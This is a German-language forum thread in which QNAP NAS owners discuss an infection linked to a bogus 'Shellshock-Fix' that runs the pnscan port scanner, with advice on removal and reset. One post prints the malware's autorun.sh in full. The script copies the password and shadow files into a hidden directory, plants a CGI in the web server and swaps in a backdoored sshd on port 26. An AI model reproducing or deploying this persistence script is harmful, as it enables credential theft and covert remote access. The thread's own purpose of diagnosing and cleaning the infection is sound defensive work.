[Malware/Virus] Shellshock-Fix 1.0.2 / pnscan

----> http://forum.qnapclub.de/viewtopic.php?f=242&t=29924

Zitat von "Smile99"

Aktuelle Firmware

Diese Version gibt es nicht bei QNAP.

Ohne eine Angabe der minimalsten Informationen kann dir niemand helfen.

Zitat von "Smile99"

es wurde nichts installiert oder verändert,

Glaube ich Dir nicht. pnscan - multi threaded port scanning tool ist nicht in der Standard-FW von QNAP enthalten.

Welche FW Version inclusive Build

Dürfte mit QFinder kein Problem darstellen.

Beim QFinder musst Du nicht klicken, der zeigt das von sich aus in der Übersicht an.

Aber Du kannst schonmal davon ausgehen, dass dein Netzwerk vermutlich von einem Bot-Netz übernommen worden ist.

Komplettreset inklusive HDD? Also alles neu aufgespielt? Ich spiele langsam auch mit dem Gedanken, da ich das selbe Problem habe. Nur dauert das überspielen der Daten dann wieder ewig. Oder liegt es nur an der Firmware? Also Reset ohne HDD und diese nachher einfach wieder einsetzen? Bist du das Problem nun los? Es liegt definitiv an diesem ShellshockFix. Seit dieser, ebenfalls am Samstag, installiert wurde, haben die Probleme angefangen. Sobald das NAS nicht mehr am Netz ist, funktioniert alles problemlos.

Zitat von "Smile99"

Bin seit ca. 1 Stunde fertig... ABER der pnscan ist wieder da!!!!!

Habe mir das grad bei player83 auf dem NAS perTeamViewer angesehen. Dort ist es ein ganz anderer Prozess.
Allerdings ist das Teil tief ins System vergraben incl. rootkit und auch das Flashrom ist betroffen.
Da wird QNAP eine spezielle Recvery-FW machen müssen, die einen kompletten Flasherase durchführt.

Da gibt es z.B. so lustige Sachen

[admin@mn83 HDB_DATA]# lldrwxrwxrwx    3 admin    administ      1.0k Dec  9 22:29 ./drwxrwxr-x   32 admin    administ      1.0k Dec  9 22:26 ../drwxr-xr-x    2 admin    administ      1.0k Dec  9 22:29 .../  <---

...und hier noch die autorun.sh im Flash-Config-Device

# cat autorun.sh




# adding Ipkg apps into system path ...
/share/MD0_DATA/optware/.xpl/.cgi
cp /etc/TZ /share/MD0_DATA/optware/etc
cp /etc/config/passwd /etc/config/group /etc/config/shadow /share/MD0_DATA/optware/etc
cp /etc/hostname /share/MD0_DATA/optware/etc
cp /etc/resolv.conf /share/MD0_DATA/optware/etc
cp /share/MD0_DATA/optware/.xpl/.exo.cgi /home/httpd/cgi-bin/exo.cgi
export PATH=/opt/sbin:/opt/bin:/usr/local/bin:/bin:/usr/bin:/usr/sbin:/mnt/ext/usr/bin:/mnt/ext/usr/local/bin
ln -sf /share/MD0_DATA/optware/opt /opt
mount -o bind /dev /share/MD0_DATA/optware/dev
mount -o bind /proc /share/MD0_DATA/optware/proc
mount -o bind /proc/bus/usb /share/MD0_DATA/optware/proc/bus/usb
mount -o bind /share/MD0_DATA/Qmultimedia /share/MD0_DATA/optware/mnt/ext/Public
mount -o bind /share/MD0_DATA/Qmultimedia /share/MD0_DATA/optware/mnt/ext/Qdownload
mount -o bind /share/MD0_DATA/Qmultimedia /share/MD0_DATA/optware/mnt/ext/Qmultimedia
mount -o bind /share/MD0_DATA/Qmultimedia /share/MD0_DATA/optware/mnt/ext/Qusb
mount -o bind /share/MD0_DATA/Qmultimedia /share/MD0_DATA/optware/mnt/ext/Qweb
rm -rf /opt
sleep 200 && sh /share/MD0_DATA/optware/.xpl/run &
sleep 30 && cp -f /opt/sbin/sshd /usr/sbin/sshd && /opt/etc/openssh/sshd_config /etc/ssh/sshd_config && /usr/sbin/sshd -f /etc/ssh/sshd_confg -p 26 &
sleep 30 && cp -f /opt/sbin/sshd /usr/sbin/sshd && /opt/etc/openssh/sshd_config /etc/ssh/sshd_config && /usr/sbin/sshd -f /etc/ssh/sshd_confg -p 26 &
sleep 200 && sh /share/MD0_DATA/optware/.xpl/run &
cp /etc/resolv.conf /share/MD0_DATA/optware/etc
cp /etc/hostname /share/MD0_DATA/optware/etc
cp /etc/TZ /share/MD0_DATA/optware/etc
cp /etc/config/passwd /etc/config/group /etc/config/shadow /share/MD0_DATA/optware/etc
rm -rf /opt
ln -sf /share/MD0_DATA/optware/opt /opt


mount -o bind /dev /share/MD0_DATA/optware/dev
mount -o bind /proc /share/MD0_DATA/optware/proc
mount -o bind /proc/bus/usb /share/MD0_DATA/optware/proc/bus/usb
mount -o bind /share/MD0_DATA/Qmultimedia /share/MD0_DATA/optware/mnt/ext/Qmultimedia
mount -o bind /share/MD0_DATA/Qmultimedia /share/MD0_DATA/optware/mnt/ext/Qdownload
mount -o bind /share/MD0_DATA/Qmultimedia /share/MD0_DATA/optware/mnt/ext/Qusb
mount -o bind /share/MD0_DATA/Qmultimedia /share/MD0_DATA/optware/mnt/ext/Qweb
mount -o bind /share/MD0_DATA/Qmultimedia /share/MD0_DATA/optware/mnt/ext/Public
# adding Ipkg apps into system path ...
export PATH=/opt/sbin:/opt/bin:/usr/local/bin:/bin:/usr/bin:/usr/sbin:/mnt/ext/usr/bin:/mnt/ext/usr/local/bin

Anzumerken ist, dass hier der SSH-Zugang mit einer modifizierten sshd überschrieben wird und auch die Crypto-Libs ausgetauscht werden.
Auch der Apache wird durch ein cgi modifiziert.

Ich komme eventuell drauf zurück.

Daten brauchst Du aber vorerst keine aufs NAS schaufeln. Um erneutes Plattmachen kommst du nicht herum.

nach der Autorun.sh liegen alle Daten in /share/MD0_DATA/optware.
Mit dem löschen des Ordners sollte der Spuk vorbei sein.
Dabei auch die autorun.sh bereinigen.

Zitat

Habe mir das grad bei player83 auf dem NAS perTeamViewer angesehen. Dort ist es ein ganz anderer Prozess.
Allerdings ist das Teil tief ins System vergraben incl. rootkit und auch das Flashrom ist betroffen.
Da wird QNAP eine spezielle Recvery-FW machen müssen, die einen kompletten Flasherase durchführt.

Ich bin leider nicht der Linux-Profi, wie sieht man denn, ob es so schlimm ist wie bei player83 oder ob doch nur ein böser Prozess läuft und ansonsten alles ok ist?
Danke!

Nochmals Danke dr_mike, auch wenn ich jetzt unglaublich müde bin... :schnarch:

Eigentlich wollte ich ja heute damit beginnen alles neu aufzusetzen, aber wenn ich das hier richtig lese, wird das alles bei mir nichts bringen, solange da nicht etwas von QNAP kommt, richtig? Hab nur keine Lust diesen riesigen Aufwand zu betreiben und danach geht es wieder von vorne los. Da bei mir in nächster Zeit sowieso ein grösseres und schnellere Nas ansteht, überlege ich mir das schon jetzt zu kaufen.